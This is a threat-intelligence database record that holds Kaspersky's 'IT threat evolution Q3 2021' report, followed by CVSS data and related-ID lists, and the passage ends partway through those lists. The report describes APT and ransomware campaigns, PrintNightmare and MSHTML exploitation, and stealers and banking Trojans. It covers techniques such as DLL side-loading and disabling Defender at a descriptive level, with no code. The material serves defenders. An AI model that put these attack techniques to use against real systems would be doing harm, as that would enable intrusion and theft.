DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "vendorId": null, "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution Q3 2021", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named &quot;Guard&quot;. Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims&#x27; identities or environment. It&#x27;s not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too &#x27;noisy&#x27; and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim&#x27;s Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim&#x27;s computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT&#x27;s networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims&#x27; registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware&#x27;s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim&#x27;s iPhone has not been not [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft&#x27;s Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group&#x27;s campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it&#x27;s likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device&#x27;s memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it&#x27;s likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a &quot;lifetime license&quot;).\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that&#x27;s about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven&#x27;t yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky&#x27;s mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user&#x27;s device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim&#x27;s machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It&#x27;s known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "published": "2021-11-26T12:00:36", "modified": "2021-11-26T12:00:36", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "reporter": "David Emm", "references": [], "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "immutableFields": [], "lastseen": "2021-11-26T14:36:44", "viewCount": 174, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465", "CPAI-2021-0554"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:C70D91615E3DC8B589B493118D474566"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0BB19334-D311-5464-B40B-7B27A0AD8825", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "14B62DA4-FBC4-5B89-AB9F-9F8E3505AFAD", "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "1883DF48-6A75-5743-AC93-56292D93A794", "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "21F83D93-118D-50C7-A5C0-B2069237666E", "24DE1902-4427-5442-BF63-7657293966E2", "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A12C3BB-2A75-5B33-AE9B-348DB656AC81", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "3D6A6F0D-C38E-5819-A3A7-817A49825CBE", "4749D0AA-8CE9-53E3-8EFF-E818FDC61B24", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4E279194-AC85-5607-A943-AC23EADADEF7", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "645DABC8-04DA-51BF-A20F-68F611D2D666", "64AAF745-D50D-575C-B3FF-A09072475502", "6BC80C90-569E-5084-8C0E-891F12F1805E", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "895FF449-0383-5007-9352-FABB3E8BD54C", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "98CEA984-CF02-58F6-91D5-967F8D36F94A", "9A318669-DAF8-50FF-A5DF-E390E0386254", "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AD904001-0962-5826-AD78-253E0FB3B7B7", "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "B3985759-BBD2-5956-860D-E6361564C262", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8D9E2C0-202B-5806-88D2-B0E797582618", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "D089579B-4420-5AD5-999F-45063D972E66", "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E06577DB-A581-55E1-968E-81430C294A84", "E235B3DF-990F-5508-9496-90462B45125D", "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FF81AF93-C247-5242-810E-AA1201C16776", "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12277", "KLA12278"]}, {"type": "kitploit", "idList": ["KITPLOIT:1624142243530526923", "KITPLOIT:232707789076746523", "KITPLOIT:2590785192528609562", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:5187040326820919368", "KITPLOIT:5230148353750207837", "KITPLOIT:698315176468431184", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527", "MS:CVE-2021-40444"]}, {"type": "mskb", "idList": ["KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", 